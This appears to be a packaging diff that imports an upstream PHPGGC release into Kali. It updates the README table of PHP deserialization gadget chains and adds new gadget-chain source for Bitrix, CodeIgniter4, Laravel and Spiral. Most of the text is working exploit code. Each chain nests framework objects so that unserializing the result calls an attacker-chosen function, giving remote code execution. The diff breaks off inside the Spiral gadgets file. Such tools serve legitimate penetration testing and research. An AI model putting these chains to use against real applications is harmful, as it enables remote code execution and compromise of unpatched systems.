Import upstream version 0.20221129
Kali Janitor
1 year, 5 months ago
19 | 19 | Gadget Chains |
20 | 20 | ------------- |
21 | 21 | |
22 | NAME VERSION TYPE VECTOR I | |
23 | CakePHP/RCE1 ? <= 3.9.6 RCE (Command) __destruct | |
24 | CakePHP/RCE2 ? <= 4.2.3 RCE (Function call) __destruct | |
25 | CodeIgniter4/RCE1 4.0.0-beta.1 <= 4.0.0-rc.4 RCE (Function call) __destruct | |
26 | CodeIgniter4/RCE2 4.0.0-rc.4 <= 4.0.4+ RCE (Function call) __destruct | |
27 | CodeIgniter4/RCE3 -4.1.3+ RCE (Function call) __destruct | |
28 | Doctrine/FW1 ? File write __toString * | |
29 | Doctrine/FW2 2.3.0 <= 2.4.0 v2.5.0 <= 2.8.5 File write __destruct * | |
30 | Dompdf/FD1 1.1.1 <= ? File delete __destruct * | |
31 | Dompdf/FD2 ? < 1.1.1 File delete __destruct * | |
32 | Drupal7/FD1 7.0 < ? File delete __destruct * | |
33 | Drupal7/RCE1 7.0.8 < ? RCE (Function call) __destruct * | |
34 | Guzzle/FW1 6.0.0 <= 6.3.3+ File write __destruct | |
35 | Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct * | |
36 | Guzzle/RCE1 6.0.0 <= 6.3.2 RCE (Function call) __destruct * | |
37 | Horde/RCE1 <= 5.2.22 RCE (PHP code) __destruct * | |
38 | Kohana/FR1 3.* File read __toString * | |
39 | Laminas/FD1 <= 2.11.2 File delete __destruct | |
40 | Laminas/FW1 2.8.0 <= 3.0.x-dev File write __destruct * | |
41 | Laravel/RCE1 5.4.27 RCE (Function call) __destruct | |
42 | Laravel/RCE10 5.6.0 <= 9.1.8+ RCE (Function call) __toString | |
43 | Laravel/RCE2 5.4.0 <= 8.6.9+ RCE (Function call) __destruct | |
44 | Laravel/RCE3 5.5.0 <= 5.8.35 RCE (Function call) __destruct * | |
45 | Laravel/RCE4 5.4.0 <= 8.6.9+ RCE (Function call) __destruct | |
46 | Laravel/RCE5 5.8.30 RCE (PHP code) __destruct * | |
47 | Laravel/RCE6 5.5.* <= 5.8.35 RCE (PHP code) __destruct * | |
48 | Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct * | |
49 | Laravel/RCE8 7.0.0 <= 8.6.9+ RCE (Function call) __destruct * | |
50 | Laravel/RCE9 5.4.0 <= 9.1.8+ RCE (Function call) __destruct | |
51 | Magento/FW1 ? <= 1.9.4.0 File write __destruct * | |
52 | Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destruct | |
53 | Magento2/FD1 * File delete __destruct * | |
54 | Monolog/FW1 3.0.0 <= 3.1.0+ File write __destruct * | |
55 | Monolog/RCE1 1.4.1 <= 1.6.0 1.17.2 <= 2.7.0+ RCE (Function call) __destruct | |
56 | Monolog/RCE2 1.4.1 <= 2.7.0+ RCE (Function call) __destruct | |
57 | Monolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destruct | |
58 | Monolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct * | |
59 | Monolog/RCE5 1.25 <= 2.7.0+ RCE (Function call) __destruct | |
60 | Monolog/RCE6 1.10.0 <= 2.7.0+ RCE (Function call) __destruct | |
61 | Monolog/RCE7 1.10.0 <= 2.7.0+ RCE (Function call) __destruct * | |
62 | Monolog/RCE8 3.0.0 <= 3.1.0+ RCE (Function call) __destruct * | |
63 | Monolog/RCE9 3.0.0 <= 3.1.0+ RCE (Function call) __destruct * | |
64 | Phalcon/RCE1 <= 1.2.2 RCE __wakeup * | |
65 | PHPCSFixer/FD1 <= 2.17.3 File delete __destruct | |
66 | PHPCSFixer/FD2 <= 2.17.3 File delete __destruct | |
67 | PHPExcel/FD1 1.8.2+ File delete __destruct | |
68 | PHPExcel/FD2 <= 1.8.1 File delete __destruct | |
69 | PHPExcel/FD3 1.8.2+ File delete __destruct | |
70 | PHPExcel/FD4 <= 1.8.1 File delete __destruct | |
71 | PHPSecLib/RCE1 2.0.0 <= 2.0.34 RCE (PHP code) __destruct * | |
72 | Pydio/Guzzle/RCE1 < 8.2.2 RCE (Function call) __toString | |
73 | Slim/RCE1 3.8.1 RCE (Function call) __toString | |
74 | Smarty/FD1 ? File delete __destruct | |
75 | Smarty/SSRF1 ? SSRF __destruct * | |
76 | SwiftMailer/FD1 -5.4.12+, -6.2.1+ File delete __destruct | |
77 | SwiftMailer/FW1 5.1.0 <= 5.4.8 File write __toString | |
78 | SwiftMailer/FW2 6.0.0 <= 6.0.1 File write __toString | |
79 | SwiftMailer/FW3 5.0.1 File write __toString | |
80 | SwiftMailer/FW4 4.0.0 <= ? File write __destruct | |
81 | Symfony/FW1 2.5.2 File write DebugImport * | |
82 | Symfony/FW2 3.4 File write __destruct | |
83 | Symfony/RCE1 3.3 RCE (Command) __destruct * | |
84 | Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct * | |
85 | Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct * | |
86 | Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct * | |
87 | Symfony/RCE5 5.2.* RCE (Function call) __destruct | |
88 | TCPDF/FD1 <= 6.3.5 File delete __destruct * | |
89 | ThinkPHP/FW1 5.0.4-5.0.24 File write __destruct * | |
90 | ThinkPHP/FW2 5.0.0-5.0.03 File write __destruct * | |
91 | ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct * | |
92 | ThinkPHP/RCE2 5.0.24 RCE (Function call) __destruct * | |
93 | Typo3/FD1 4.5.35 <= 10.4.1 File delete __destruct * | |
94 | WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct * | |
95 | WordPress/Dompdf/RCE2 0.7.0 <= 0.8.4 & WP < 5.5.2 RCE (Function call) __destruct * | |
96 | WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __toString * | |
97 | WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __destruct * | |
98 | WordPress/P/EmailSubscribers/RCE1 4.0 <= 4.4.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
99 | WordPress/P/EverestForms/RCE1 1.0 <= 1.6.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
100 | WordPress/P/WooCommerce/RCE1 3.4.0 <= 4.1.0+ & WP < 5.5.2 RCE (Function call) __destruct * | |
101 | WordPress/P/WooCommerce/RCE2 <= 3.4.0 & WP < 5.5.2 RCE (Function call) __destruct * | |
102 | WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 & WP < 5.5.2 RCE (Function call) __destruct * | |
103 | WordPress/PHPExcel/RCE1 1.8.2+ & WP < 5.5.2 RCE (Function call) __toString * | |
104 | WordPress/PHPExcel/RCE2 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __toString * | |
105 | WordPress/PHPExcel/RCE3 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
106 | WordPress/PHPExcel/RCE4 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
107 | WordPress/PHPExcel/RCE5 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
108 | WordPress/PHPExcel/RCE6 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
109 | Yii/RCE1 1.1.20 RCE (Function call) __wakeup * | |
110 | Yii2/RCE1 <2.0.38 RCE (Function call) __destruct * | |
111 | Yii2/RCE2 <2.0.38 RCE (PHP code) __destruct * | |
112 | ZendFramework/FD1 ? <= 1.12.20 File delete __destruct | |
113 | ZendFramework/RCE1 ? <= 1.12.20 RCE (PHP code) __destruct * | |
114 | ZendFramework/RCE2 1.11.12 <= 1.12.20 RCE (Function call) __toString * | |
115 | ZendFramework/RCE3 2.0.1 <= ? RCE (Function call) __destruct | |
116 | ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct * | |
22 | NAME VERSION TYPE VECTOR I | |
23 | Bitrix/RCE1 17.x.x <= 22.0.300 RCE (Function call) __destruct | |
24 | CakePHP/RCE1 ? <= 3.9.6 RCE (Command) __destruct | |
25 | CakePHP/RCE2 ? <= 4.2.3 RCE (Function call) __destruct | |
26 | CodeIgniter4/RCE1 4.0.2 <= 4.0.3 RCE (Function call) __destruct | |
27 | CodeIgniter4/RCE2 4.0.0-rc.4 <= 4.0.4+ RCE (Function call) __destruct | |
28 | CodeIgniter4/RCE3 -4.1.3+ RCE (Function call) __destruct | |
29 | CodeIgniter4/RCE4 4.0.0-beta.1 <= 4.0.0-rc.4 RCE (Function call) __destruct | |
30 | Doctrine/FW1 ? File write __toString * | |
31 | Doctrine/FW2 2.3.0 <= 2.4.0 v2.5.0 <= 2.8.5 File write __destruct * | |
32 | Dompdf/FD1 1.1.1 <= ? File delete __destruct * | |
33 | Dompdf/FD2 ? < 1.1.1 File delete __destruct * | |
34 | Drupal7/FD1 7.0 < ? File delete __destruct * | |
35 | Drupal7/RCE1 7.0.8 < ? RCE (Function call) __destruct * | |
36 | Guzzle/FW1 6.0.0 <= 6.3.3+ File write __destruct | |
37 | Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct * | |
38 | Guzzle/RCE1 6.0.0 <= 6.3.2 RCE (Function call) __destruct * | |
39 | Horde/RCE1 <= 5.2.22 RCE (PHP code) __destruct * | |
40 | Kohana/FR1 3.* File read __toString * | |
41 | Laminas/FD1 <= 2.11.2 File delete __destruct | |
42 | Laminas/FW1 2.8.0 <= 3.0.x-dev File write __destruct * | |
43 | Laravel/RCE1 5.4.27 RCE (Function call) __destruct | |
44 | Laravel/RCE2 5.4.0 <= 8.6.9+ RCE (Function call) __destruct | |
45 | Laravel/RCE3 5.5.0 <= 5.8.35 RCE (Function call) __destruct * | |
46 | Laravel/RCE4 5.4.0 <= 8.6.9+ RCE (Function call) __destruct | |
47 | Laravel/RCE5 5.8.30 RCE (PHP code) __destruct * | |
48 | Laravel/RCE6 5.5.* <= 5.8.35 RCE (PHP code) __destruct * | |
49 | Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct * | |
50 | Laravel/RCE8 7.0.0 <= 8.6.9+ RCE (Function call) __destruct * | |
51 | Laravel/RCE9 5.4.0 <= 9.1.8+ RCE (Function call) __destruct | |
52 | Laravel/RCE10 5.6.0 <= 9.1.8+ RCE (Function call) __toString | |
53 | Laravel/RCE11 5.4.0 <= 9.1.8+ RCE (Function call) __destruct | |
54 | Laravel/RCE12 5.8.35, 7.0.0, 9.3.10 RCE (Function call) __destruct * | |
55 | Magento/FW1 ? <= 1.9.4.0 File write __destruct * | |
56 | Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destruct | |
57 | Magento2/FD1 * File delete __destruct * | |
58 | Monolog/FW1 3.0.0 <= 3.1.0+ File write __destruct * | |
59 | Monolog/RCE1 1.4.1 <= 1.6.0 1.17.2 <= 2.7.0+ RCE (Function call) __destruct | |
60 | Monolog/RCE2 1.4.1 <= 2.7.0+ RCE (Function call) __destruct | |
61 | Monolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destruct | |
62 | Monolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct * | |
63 | Monolog/RCE5 1.25 <= 2.7.0+ RCE (Function call) __destruct | |
64 | Monolog/RCE6 1.10.0 <= 2.7.0+ RCE (Function call) __destruct | |
65 | Monolog/RCE7 1.10.0 <= 2.7.0+ RCE (Function call) __destruct * | |
66 | Monolog/RCE8 3.0.0 <= 3.1.0+ RCE (Function call) __destruct * | |
67 | Monolog/RCE9 3.0.0 <= 3.1.0+ RCE (Function call) __destruct * | |
68 | Phalcon/RCE1 <= 1.2.2 RCE __wakeup * | |
69 | PHPCSFixer/FD1 <= 2.17.3 File delete __destruct | |
70 | PHPCSFixer/FD2 <= 2.17.3 File delete __destruct | |
71 | PHPExcel/FD1 1.8.2+ File delete __destruct | |
72 | PHPExcel/FD2 <= 1.8.1 File delete __destruct | |
73 | PHPExcel/FD3 1.8.2+ File delete __destruct | |
74 | PHPExcel/FD4 <= 1.8.1 File delete __destruct | |
75 | PHPSecLib/RCE1 2.0.0 <= 2.0.34 RCE (PHP code) __destruct * | |
76 | Pydio/Guzzle/RCE1 < 8.2.2 RCE (Function call) __toString | |
77 | Slim/RCE1 3.8.1 RCE (Function call) __toString | |
78 | Smarty/FD1 ? File delete __destruct | |
79 | Smarty/SSRF1 ? SSRF __destruct * | |
80 | Spiral/RCE1 2.7.0 <= 2.8.13 RCE (Function call) __destruct | |
81 | Spiral/RCE2 -2.8+ RCE (Function call) __destruct * | |
82 | SwiftMailer/FD1 -5.4.12+, -6.2.1+ File delete __destruct | |
83 | SwiftMailer/FW1 5.1.0 <= 5.4.8 File write __toString | |
84 | SwiftMailer/FW2 6.0.0 <= 6.0.1 File write __toString | |
85 | SwiftMailer/FW3 5.0.1 File write __toString | |
86 | SwiftMailer/FW4 4.0.0 <= ? File write __destruct | |
87 | Symfony/FW1 2.5.2 File write DebugImport * | |
88 | Symfony/FW2 3.4 File write __destruct | |
89 | Symfony/RCE1 3.3 RCE (Command) __destruct * | |
90 | Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct * | |
91 | Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct * | |
92 | Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct * | |
93 | Symfony/RCE5 5.2.* RCE (Function call) __destruct | |
94 | Symfony/RCE6 v3.4.0-BETA4 <= v3.4.49 & v4.0.0-BETA4 <= v4.1.13 RCE (Command) __destruct * | |
95 | TCPDF/FD1 <= 6.3.5 File delete __destruct * | |
96 | ThinkPHP/FW1 5.0.4-5.0.24 File write __destruct * | |
97 | ThinkPHP/FW2 5.0.0-5.0.03 File write __destruct * | |
98 | ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct * | |
99 | ThinkPHP/RCE2 5.0.24 RCE (Function call) __destruct * | |
100 | Typo3/FD1 4.5.35 <= 10.4.1 File delete __destruct * | |
101 | WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct * | |
102 | WordPress/Dompdf/RCE2 0.7.0 <= 0.8.4 & WP < 5.5.2 RCE (Function call) __destruct * | |
103 | WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __toString * | |
104 | WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __destruct * | |
105 | WordPress/P/EmailSubscribers/RCE1 4.0 <= 4.4.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
106 | WordPress/P/EverestForms/RCE1 1.0 <= 1.6.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
107 | WordPress/P/WooCommerce/RCE1 3.4.0 <= 4.1.0+ & WP < 5.5.2 RCE (Function call) __destruct * | |
108 | WordPress/P/WooCommerce/RCE2 <= 3.4.0 & WP < 5.5.2 RCE (Function call) __destruct * | |
109 | WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 & WP < 5.5.2 RCE (Function call) __destruct * | |
110 | WordPress/PHPExcel/RCE1 1.8.2+ & WP < 5.5.2 RCE (Function call) __toString * | |
111 | WordPress/PHPExcel/RCE2 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __toString * | |
112 | WordPress/PHPExcel/RCE3 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
113 | WordPress/PHPExcel/RCE4 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
114 | WordPress/PHPExcel/RCE5 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
115 | WordPress/PHPExcel/RCE6 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
116 | Yii/RCE1 1.1.20 RCE (Function call) __wakeup * | |
117 | Yii2/RCE1 <2.0.38 RCE (Function call) __destruct * | |
118 | Yii2/RCE2 <2.0.38 RCE (PHP code) __destruct * | |
119 | ZendFramework/FD1 ? <= 1.12.20 File delete __destruct | |
120 | ZendFramework/RCE1 ? <= 1.12.20 RCE (PHP code) __destruct * | |
121 | ZendFramework/RCE2 1.11.12 <= 1.12.20 RCE (Function call) __toString * | |
122 | ZendFramework/RCE3 2.0.1 <= ? RCE (Function call) __destruct | |
123 | ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct * | |
124 | ZendFramework/RCE5 2.0.0rc2 <= 2.5.3 RCE (Function call) __destruct | |
117 | 125 | ``` |
118 | 126 | |
119 | 127 | Filter gadget chains: |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Bitrix; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '17.x.x <= 22.0.300'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'crlf'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Bitrix\Main\ORM\Data\Result( | |
16 | new \Bitrix\Main\Type\Dictionary( | |
17 | new \Bitrix\Main\Error( | |
18 | new \Bitrix\Main\UI\Viewer\ItemAttributes( | |
19 | new \Bitrix\Main\DB\ResultIterator( | |
20 | new \Bitrix\Main\DB\ArrayResult( | |
21 | $function, $parameter | |
22 | ) | |
23 | ) | |
24 | ) | |
25 | ) | |
26 | ) | |
27 | ); | |
28 | } | |
29 | } |
0 | <?php | |
1 | ||
2 | namespace Bitrix\Main { | |
3 | class Result | |
4 | { | |
5 | protected $errors; | |
6 | ||
7 | public function __construct(object $Dictionary) | |
8 | { | |
9 | $this->errors = $Dictionary; | |
10 | } | |
11 | } | |
12 | ||
13 | class Error { | |
14 | protected $message; | |
15 | ||
16 | public function __construct(object $ItemAttributes) | |
17 | { | |
18 | $this->message = $ItemAttributes; | |
19 | } | |
20 | } | |
21 | } | |
22 | ||
23 | namespace Bitrix\Main\ORM\Data { | |
24 | class Result extends \Bitrix\Main\Result | |
25 | { | |
26 | protected $isSuccess = false; | |
27 | protected $wereErrorsChecked = false; | |
28 | ||
29 | public function __construct(object $Dictionary) | |
30 | { | |
31 | parent::__construct($Dictionary); | |
32 | } | |
33 | } | |
34 | } | |
35 | ||
36 | namespace Bitrix\Main\Type { | |
37 | class Dictionary | |
38 | { | |
39 | protected $values; | |
40 | ||
41 | public function __construct(object $Error) | |
42 | { | |
43 | $this->values = [$Error]; | |
44 | } | |
45 | } | |
46 | } | |
47 | ||
48 | namespace Bitrix\Main\UI\Viewer { | |
49 | class ItemAttributes | |
50 | { | |
51 | protected $attributes; | |
52 | ||
53 | public function __construct(object $ResultIterator) | |
54 | { | |
55 | $this->attributes = $ResultIterator; | |
56 | } | |
57 | } | |
58 | } | |
59 | ||
60 | namespace Bitrix\Main\DB { | |
61 | class ResultIterator | |
62 | { | |
63 | private $counter = 0; | |
64 | private $currentData = 0; | |
65 | private $result; | |
66 | ||
67 | public function __construct(object $ArrayResult) | |
68 | { | |
69 | $this->result = $ArrayResult; | |
70 | } | |
71 | } | |
72 | ||
73 | class ArrayResult | |
74 | { | |
75 | protected $resource; | |
76 | protected $converters; | |
77 | ||
78 | public function __construct(string $function, string $parameter) | |
79 | { | |
80 | $this->converters = [$function, 'WriteFinalMessage']; | |
81 | $this->resource = [[$parameter], [['rce']]]; | |
82 | } | |
83 | } | |
84 | } |
3 | 3 | |
4 | 4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall |
5 | 5 | { |
6 | public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4'; | |
6 | public static $version = '4.0.2 <= 4.0.3'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'eboda'; |
9 | 9 |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\CodeIgniter4; | |
3 | ||
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'eboda'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter); | |
16 | } | |
17 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace CodeIgniter\Cache\Handlers | |
3 | { | |
4 | class RedisHandler | |
5 | { | |
6 | protected $redis; | |
7 | ||
8 | public function __construct($func, $param) | |
9 | { | |
10 | $this->redis = new \CodeIgniter\Session\Handlers\MemcachedHandler( | |
11 | new \CodeIgniter\Model( | |
12 | new \CodeIgniter\Database\BaseBuilder, | |
13 | new \CodeIgniter\Validation\Validation, | |
14 | $func | |
15 | ), | |
16 | $param | |
17 | ); | |
18 | } | |
19 | } | |
20 | } | |
21 | ||
22 | namespace CodeIgniter\Session\Handlers | |
23 | { | |
24 | class MemcachedHandler | |
25 | { | |
26 | protected $memcached; | |
27 | protected $lockKey; | |
28 | ||
29 | public function __construct($memcached, $param) | |
30 | { | |
31 | $this->lockKey = $param; | |
32 | $this->memcached = $memcached; | |
33 | } | |
34 | } | |
35 | } | |
36 | ||
37 | namespace CodeIgniter | |
38 | { | |
39 | class Model | |
40 | { | |
41 | protected $builder; | |
42 | protected $primaryKey; | |
43 | protected $beforeDelete; | |
44 | protected $validationRules; | |
45 | protected $validation; | |
46 | ||
47 | public function __construct($builder, $validation, $func) | |
48 | { | |
49 | $this->builder = $builder; | |
50 | $this->primaryKey = null; | |
51 | ||
52 | $this->beforeDelete = array(); | |
53 | $this->beforeDelete[] = "validate"; | |
54 | ||
55 | $this->validation = $validation; | |
56 | $this->validationRules = array( | |
57 | "id" => array($func) | |
58 | ); | |
59 | } | |
60 | } | |
61 | } | |
62 | ||
63 | namespace CodeIgniter\Validation | |
64 | { | |
65 | class Validation | |
66 | { | |
67 | protected $ruleSetFiles; | |
68 | ||
69 | public function __construct() | |
70 | { | |
71 | $this->ruleSetFiles = array("finfo"); | |
72 | } | |
73 | } | |
74 | } | |
75 | ||
76 | namespace CodeIgniter\Database | |
77 | { | |
78 | class BaseBuilder | |
79 | { | |
80 | } | |
81 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\CodeIgniter4; | |
3 | ||
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '-4.1.3+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Predis\Connection\StreamConnection($function, $parameter); | |
16 | } | |
17 | } |
0 | <?php | |
1 | ||
2 | namespace Predis\Connection | |
3 | { | |
4 | class StreamConnection | |
5 | { | |
6 | protected $parameters; | |
7 | ||
8 | function __construct($function, $paramter) | |
9 | { | |
10 | $this->parameters = new \CodeIgniter\Entity\Entity($function, $paramter); | |
11 | } | |
12 | } | |
13 | } | |
14 | ||
15 | namespace CodeIgniter\Entity | |
16 | { | |
17 | class Entity | |
18 | { | |
19 | protected $datamap; | |
20 | ||
21 | function __construct($function, $parameter) | |
22 | { | |
23 | $this->datamap = ["persistent" => new \Symfony\Component\HttpFoundation\Request($function, $parameter)]; | |
24 | } | |
25 | } | |
26 | } | |
27 | ||
28 | namespace Symfony\Component\HttpFoundation | |
29 | { | |
30 | class Request | |
31 | { | |
32 | public $server; | |
33 | public $cookies; | |
34 | ||
35 | function __construct($function, $paramter) | |
36 | { | |
37 | $this->cookies = ["key" => "value"]; | |
38 | $this->server = new \Symfony\Component\DependencyInjection\Argument\ServiceLocator($function, $paramter); | |
39 | } | |
40 | } | |
41 | } | |
42 | ||
43 | namespace Symfony\Component\DependencyInjection\Argument | |
44 | { | |
45 | class ServiceLocator | |
46 | { | |
47 | private $serviceMap; | |
48 | private $factory; | |
49 | ||
50 | function __construct($function, $paramter) | |
51 | { | |
52 | $this->factory = "call_user_func"; | |
53 | $this->serviceMap = ["REQUEST_METHOD" => [$function, $paramter]]; | |
54 | } | |
55 | } | |
56 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\CodeIgniter4; | |
3 | ||
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '-4.1.3 <= 4.2.10+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Predis\Response\Iterator\MultiBulk($function, $parameter); | |
16 | } | |
17 | } |
0 | <?php | |
1 | namespace Predis\Response\Iterator{ | |
2 | class MultiBulk{ | |
3 | protected $position; | |
4 | protected $size; | |
5 | private $connection; | |
6 | ||
7 | function __construct($function,$paramter) | |
8 | { | |
9 | $this->connection = new \Faker\ValidGenerator($function,$paramter); | |
10 | $this->position = 0; | |
11 | $this->size = 1; | |
12 | } | |
13 | } | |
14 | } | |
15 | ||
16 | namespace Faker{ | |
17 | class ValidGenerator{ | |
18 | protected $generator; | |
19 | protected $maxRetries; | |
20 | protected $validator; | |
21 | ||
22 | function __construct($function,$param) | |
23 | { | |
24 | $this->maxRetries = 1; | |
25 | $this->validator = $function; | |
26 | $this->generator = new \Faker\DefaultGenerator($param); | |
27 | } | |
28 | } | |
29 | ||
30 | class DefaultGenerator{ | |
31 | protected $default; | |
32 | ||
33 | function __construct($param) | |
34 | { | |
35 | $this->default = $param; | |
36 | } | |
37 | } | |
38 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Laravel; | |
3 | ||
4 | class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '5.8.35, 7.0.0, 9.3.10'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | public static $information = 'According to different version you may need to modify the "gadgets.php". For Laravel5, use the field $rollbarNotifier. For laravel7 and later, use the filed $rollbarLogger'; | |
10 | ||
11 | ||
12 | public function generate(array $parameters) | |
13 | { | |
14 | $function = $parameters['function']; | |
15 | $param = $parameters['parameter']; | |
16 | ||
17 | $a = new \Monolog\Handler\RollbarHandler($function, $param); | |
18 | ||
19 | return $a; | |
20 | } | |
21 | } |
0 | <?php | |
1 | ||
2 | namespace Monolog\Handler{ | |
3 | class RollbarHandler{ | |
4 | private $hasRecords; | |
5 | //protected $rollbarNotifier; | |
6 | protected $rollbarLogger; | |
7 | ||
8 | function __construct($function,$paramter) | |
9 | { | |
10 | $this->hasRecords = true; | |
11 | //$this->rollbarNotifier = new \Illuminate\Foundation\Support\Providers\RouteServiceProvider($function,$paramter);//laravel5.8.35 | |
12 | $this->rollbarLogger = new \Illuminate\Foundation\Support\Providers\RouteServiceProvider($function,$paramter);//laravel7.0.0 | |
13 | } | |
14 | } | |
15 | } | |
16 | ||
17 | namespace Illuminate\Foundation\Support\Providers{ | |
18 | class RouteServiceProvider{ | |
19 | protected $app; | |
20 | ||
21 | function __construct($function,$paramter) | |
22 | { | |
23 | $this->app = new \Illuminate\View\Factory($function,$paramter); | |
24 | } | |
25 | } | |
26 | } | |
27 | ||
28 | namespace Illuminate\View{ | |
29 | class Factory{ | |
30 | protected $finder; | |
31 | ||
32 | function __construct($function,$paramter) | |
33 | { | |
34 | $this->finder = new \Symfony\Component\Console\Application($function,$paramter); | |
35 | } | |
36 | ||
37 | } | |
38 | } | |
39 | ||
40 | namespace Symfony\Component\Console{ | |
41 | class Application{ | |
42 | private $initialized; | |
43 | private $commands; | |
44 | private $commandLoader; | |
45 | ||
46 | function __construct($function,$paramter) | |
47 | { | |
48 | $this->initialized = true; | |
49 | $this->commandLoader = new \Illuminate\Cache\Repository($function,$paramter); | |
50 | $this->commands = [new \Illuminate\Foundation\AliasLoader()]; | |
51 | } | |
52 | } | |
53 | } | |
54 | ||
55 | namespace Illuminate\Foundation{ | |
56 | class AliasLoader{ | |
57 | protected $aliases; | |
58 | ||
59 | function __construct() | |
60 | { | |
61 | $this->aliases = ["key"]; | |
62 | } | |
63 | } | |
64 | } | |
65 | ||
66 | namespace Illuminate\Cache{ | |
67 | class Repository{ | |
68 | protected $store; | |
69 | ||
70 | function __construct($function,$paramter) | |
71 | { | |
72 | $this->store = new \PhpOption\LazyOption($function,$paramter); | |
73 | } | |
74 | } | |
75 | } | |
76 | ||
77 | namespace PhpOption{ | |
78 | class LazyOption{ | |
79 | private $option; | |
80 | private $callback; | |
81 | private $arguments; | |
82 | ||
83 | function __construct($function,$paramter) | |
84 | { | |
85 | $this->callback = $function; | |
86 | $this->arguments = [$paramter]; | |
87 | } | |
88 | } | |
89 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Spiral; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '2.7.0 <= 2.8.13'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Monolog\Handler\RotatingFileHandler($function,$parameter); | |
16 | } | |
17 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace Monolog\Handler | |
3 | { | |
4 | class RotatingFileHandler | |
5 | { | |
6 | protected $mustRotate; | |
7 | protected $filename; | |
8 | protected $filenameFormat; | |
